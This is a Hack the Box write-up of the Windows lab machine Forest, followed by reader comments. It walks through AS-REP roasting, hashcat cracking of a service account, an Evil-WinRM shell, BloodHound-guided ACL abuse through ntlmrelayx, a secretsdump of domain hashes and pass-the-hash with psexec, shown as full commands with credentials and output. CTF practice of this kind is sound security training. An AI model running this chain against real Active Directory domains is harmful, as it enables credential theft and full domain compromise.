Hack the Box – Forest Writeup [10.10.10.161]

Forest is a Windows based easy box.

You will learn folloiwng by exploiting the machine.

  • Enumeration of Windows Domain Services and gathering users
  • Learn how to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH).
  • Learn how to crack Windows Remote Management (WinRM) service

As usual I add the IP of the Forest machine 10.10.10.161 to /etc/hosts as forest.htb and started off with nmap port scan.

➜  forest nmap -sTV -p 1-65535 -oN nmap_tcp_scan 10.10.10.161
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-05 19:43 +03
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan

Nmap scan report for 10.10.10.161
Host is up (0.016s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-21 09:54:20Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49674/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc        Microsoft Windows RPC
49682/tcp open  msrpc        Microsoft Windows RPC
49701/tcp open  msrpc        Microsoft Windows RPC
49913/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 362.12 seconds

I found there are several ports opened, it seems interesting to me. From the scan report and the opened ports, I found the machine is possibly a domain contollerr of the domain “htb.local“. The domain services like kerberos, ldap, SMB and WinRM port are open and accessable from the internet – which in reality a huge vulnaribility.

So, being a Windows system administrator for more than 10 years, I know where to start. I can use a tool called enum4linux to see if I can enumerate user and other domain information.

➜  forest enum4linux -a 10.10.10.161
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Nov  5 20:01:41 2019

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.10.161    |
 ==================================================== 
[E] Can't find workgroup/domain


 ============================================ 
|    Nbtstat Information for 10.10.10.161    |
 ============================================ 
Looking up status of 10.10.10.161
No reply from 10.10.10.161

 ===================================== 
|    Session Check on 10.10.10.161    |
 ===================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.10.161 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name: 

 =========================================== 
|    Getting domain SID for 10.10.10.161    |
 =========================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)

 ====================================== 
|    OS information on 10.10.10.161    |
 ====================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.161 from smbclient: 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.10.161 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ============================= 
|    Users on 10.10.10.161    |
 ============================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA	Name: (null)	Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00020010 Account: Administrator	Name: Administrator	Desc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy	Name: Andy Hislip	Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount	Name: (null)	Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain
index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1	Name: HealthMailbox-EXCH01-010	Desc: (null)
index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e	Name: HealthMailbox-EXCH01-003	Desc: (null)
index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678	Name: HealthMailbox-EXCH01-005	Desc: (null)
index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e	Name: HealthMailbox-EXCH01-009	Desc: (null)
index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781	Name: HealthMailbox-EXCH01-006	Desc: (null)
index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d	Name: HealthMailbox-EXCH01-004	Desc: (null)
index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64	Name: HealthMailbox-EXCH01-008	Desc: (null)
index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9	Name: HealthMailbox-EXCH01-002	Desc: (null)
index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722	Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013	Desc: (null)
index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad	Name: HealthMailbox-EXCH01-001	Desc: (null)
index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238	Name: HealthMailbox-EXCH01-007	Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00020011 Account: krbtgt	Name: (null)	Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda	Name: Lucinda Berger	Desc: (null)
index: 0x2372 RID: 0x1db1 acb: 0x00000010 Account: m00haha	Name: (null)	Desc: (null)
index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark	Name: Mark Brandt	Desc: (null)
index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi	Name: Santi Rodriguez	Desc: (null)
index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien	Name: Sebastien Caron	Desc: (null)
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb	Name: Microsoft Exchange Migration	Desc: (null)
index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb	Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}	Desc: (null)
index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb	Name: Microsoft Exchange Approval Assistant	Desc: (null)
index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18	Name: Discovery Search Mailbox	Desc: (null)
index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a	Name: Microsoft Exchange	Desc: (null)
index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb	Name: E4E Encryption Store - Active	Desc: (null)
index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549	Name: Microsoft Exchange Federation Mailbox	Desc: (null)
index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b	Name: Microsoft Exchange	Desc: (null)
index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b	Name: Microsoft Exchange	Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco	Name: svc-alfresco	Desc: (null)

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
user:[m00haha] rid:[0x1db1]

 ========================================= 
|    Share Enumeration on 10.10.10.161    |
 ========================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
smb1cli_req_writev_submit: called for dialect[SMB3_11] server[10.10.10.161]
do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

	Sharename       Type      Comment
	---------       ----      -------
Error returning browse list: NT_STATUS_REVISION_MISMATCH
Reconnecting with SMB1 for workgroup listing.
Failed to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.10.161

 ==================================================== 
|    Password Policy Information for 10.10.10.161    |
 ==================================================== 


[+] Attaching to 10.10.10.161 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

	[+] HTB
	[+] Builtin

[+] Password Info for Domain: HTB

	[+] Minimum password length: 7
	[+] Password history length: 24
	[+] Maximum password age: 41 days 23 hours 53 minutes 
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: 1 day 4 minutes 
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: Not Set

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 7


 ============================== 
|    Groups on 10.10.10.161    |
 ============================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting builtin groups:
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]

======================================================================= 
|    Users on 10.10.10.161 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 742.

 ============================================= 
|    Getting printer info for 10.10.10.161    |
 ============================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991.
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Tue Nov  5 20:08:17 2019

So as expected, Enum4linux command returned with a lot of information. Within the information, I found few users sebastien,lucinda,andy,mark,santi and service account called svc-alfresco. Also, I found the domain policy was so loosely configured – no password complexity enforced. This hints that the password can be easily cracked. I as well found the server as well installed with a Microsoft Exchange instance.

As from my past experience, I decided to run impacket/GetNPUsers.py (https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py) to see if I can get the users that have the property Do not require Kerberos pre-authentication set (UF_DONT_REQUIRE_PREAUTH).

I tried the user names I gathered in previous step – but none worked, luckily the service account svc-alfresco revealed his TGT (ticket-granting ticket)

➜  forest GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/sebastien
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for sebastien
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
➜  forest GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/lucinda
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
➜  forest GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/svc-alfresco
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:99042a3f11c83cf7323020f8ab1924ef$667405d6212a270a26266e95bae0a14400647dfa26313044b8fe384cfaef8290c39dda101e47b32b88f146c409543df84fd472c7d2d6d34a600069f6bb798e90840612a2245837cb029ea8e3beebd2ca9875a1f1cfe01089ccec079a93d594b4f9809bab138c8f216c8882b870f18b3fd5f433fe1f5f8108a3cd6ccedb2905820e0594d5e774e6abbe96206f01baf2984f9242f3a08a38ca9218d9327bb5d46aebe95502644e24feb71a3771ed19acdbed8621f618593e544cc5e15fb78f989ba1914c4354a7c554fae6443227202a3a74df206907e70d6a554555a47861c7bf
➜  forest 

I knew that, I can crack the TGT hash using hashcat.

➜  forest hashcat -m 18200 -a 0 -w 3 forest.hash /usr/share/wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i5-6300U CPU @ 2.40GHz, 2048/5740 MB allocatable, 2MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

$krb5asrep$23$svc-alfresco@HTB:99042a3f11c83cf7323020f8ab1924ef$667405d6212a270a26266e95bae0a14400647dfa26313044b8fe384cfaef8290c39dda101e47b32b88f146c409543df84fd472c7d2d6d34a600069f6bb798e90840612a2245837cb029ea8e3beebd2ca9875a1f1cfe01089ccec079a93d594b4f9809bab138c8f216c8882b870f18b3fd5f433fe1f5f8108a3cd6ccedb2905820e0594d5e774e6abbe96206f01baf2984f9242f3a08a38ca9218d9327bb5d46aebe95502644e24feb71a3771ed19acdbed8621f618593e544cc5e15fb78f989ba1914c4354a7c554fae6443227202a3a74df206907e70d6a554555a47861c7bf:s3rvice

I used the rockyou.txt wordlist for Hashcat, it cracked the password of service account svc-alfresco:s3rvice
The next step is to get the shell. There is a WinRM exploit tool called Evil-WinRM Shell in the GitHub repository that allows me to get shell if I have the right credentials. Since I have svc-alfresco’s credentials, I fire up the Evil-WinRM after a slight modification in the command.

➜  evil-winrm git:(master) ruby evil-winrm.rb -i 10.10.10.161 -u svc-alfresco -p s3rvice -P 5985

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 

Getting User.txt

I immidiatly got the shell as svc-alfresco and I grab the user.txt

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls


    Directory: C:\Users\svc-alfresco\Desktop


Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
-ar---        9/23/2019   2:16 PM             32 user.txt                                                                                                                                                                                                


*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
e5e4e4------------------13fb0d9ed
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> 

Privilege Escalation

Now that I had a user shell, my next goal is to get admin shell. The HTB forum someone said, SharpHound.ps1 can be used to identify a possible route to domain admin. But this script need to upload to the Forest machine.

BloodHound
https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1

Since the user svc-alfresco has rights to create a folder within C, I made a temporary directory called the temp
Now that I had this directory, I uploaded the Sharphound.ps1 file to this directory.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload /root/htb/forest/SharpHound.ps1 c:\temp\SharpHound.ps1
Info: Uploading /root/htb/forest/SharpHound.ps1 to c:\temp\SharpHound.ps1

Data: 1226056 bytes of 1226056 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd /
*Evil-WinRM* PS C:\> ls
    Directory: C:\

Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
d-----        9/20/2019   1:18 PM                PerfLogs                                                                                                                                                                                                
d-r---        9/22/2019   4:56 PM                Program Files                                                                                                                                                                                           
d-----       11/20/2016   6:36 PM                Program Files (x86)                                                                                                                                                                                     
d-----        11/5/2019  10:09 AM                temp                                                                                                                                                                                                    
d-r---        11/5/2019   2:29 AM                Users                                                                                                                                                                                                   
d-----        11/5/2019   4:22 AM                Windows                                                                                                                                                                                                 

*Evil-WinRM* PS C:\> cd temp
*Evil-WinRM* PS C:\temp> ls
    Directory: C:\temp
Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
-a----        11/5/2019  10:10 AM         919544 SharpHound.ps1                                                                                                                                                                                          

Now I got the SharpHound.ps1 file uploaded, I imported it into the PowerShell sessions so that I could then run it.

Import-module ./SharpHound.ps1

Invoke-BloodHound -CollectionMethod All

As soon as I ran this command, I had a zip file within the same directory.

I download the file was successfully transferred and I loaded instantly into BloodHound by simply dragging and dropping it.

The bloodhound revealed that the user who is part of the ‘Exchange Windows Permissions’ group, has the possibility to Write the ACL of the entire HTB.Local domain.

I immidiatly gave user svc-alfresco the required permission

*Evil-WinRM* PS C:\> net group "Exchange Windows Permissions" svc-alfresco /add
The command completed successfully.

*Evil-WinRM* PS C:\> 

Now that I had a possible route, I decided to use the impacket tool ntlmrealyx.py.

  forest python ntlmrelayx.py -t ldap://10.10.10.161 --escalate-user svc-alfresco
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

Now I need to authorize the connection, I need to browse the http://localhost/privexchange and login as user svc-alfresco to authenticate the action. As soon as I authenticate, I can see the user svc-alfresco got permission.

[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
[*] HTTPD: Client requested path: /privexchange
[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
[*] HTTPD: Client requested path: /privexchange
[*] HTTPD: Client requested path: /privexchange
[*] Authenticating against ldap://10.10.10.161 as \svc-alfresco SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
[*] HTTPD: Client requested path: /favicon.ico
[*] HTTPD: Client requested path: /favicon.ico
[*] HTTPD: Client requested path: /favicon.ico
[*] User privileges found: Create user
[*] Dumping domain info for first time
[*] Authenticating against ldap://10.10.10.161 as \svc-alfresco SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Domain info dumped into lootdir!
[*] User privileges found: Create user

I went on to get the hash from administrator using impacket-secretsdump tool

➜  examples git:(master) ✗ secretsdump htb/svc-alfresco:s3rvice@10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

And, we have the password hash from htb.local/Administrator. I used the impacket/wmiexec.py to pass the hash and get the root.txt

➜  forest psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 htb/administrator@10.10.10.161 powershell.exe
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file iBvMECpa.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service MKyb on 10.10.10.161.....
[*] Starting service MKyb.....
[!] Press help for extra shell commands
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> type c:\Users\Administrator\Desktop\root.txt
ype c:\Users\Administrator\Desktop\root.txt
f04-----------------129cc
PS C:\Windows\system32> 

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
8 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
0verflowme
0verflowme
8 months ago

PRO TIP : you could also use “-request” option in GetNPusers to get hashes of users without enumerating users 😉

nophone
nophone
Reply to  0verflowme
8 months ago

need to browse the http://localhost/privexchange . and how to do it. thx:-) . i got root not in the way

trackback
8 months ago

[…] Hack the Box – Forest Writeup [10.10.10.161] […]

trackback
8 months ago

[…] Hack the Box – Forest Writeup [10.10.10.161] […]

trackback
7 months ago

[…] Hack the Box – Forest Writeup [10.10.10.161] […]

thom35
6 months ago

Why did you confidently say that svc-alfresco is a service account based on the enum4linux output?

Guest
6 months ago

hello,when i browse to http://localhost/privexchange i get stuck on [*] Domain info dumped into lootdir! . Yesterday it somehow worked but im probably making the problem here. Do i have to install privexchange on localhost?

Sorry, that action is blocked.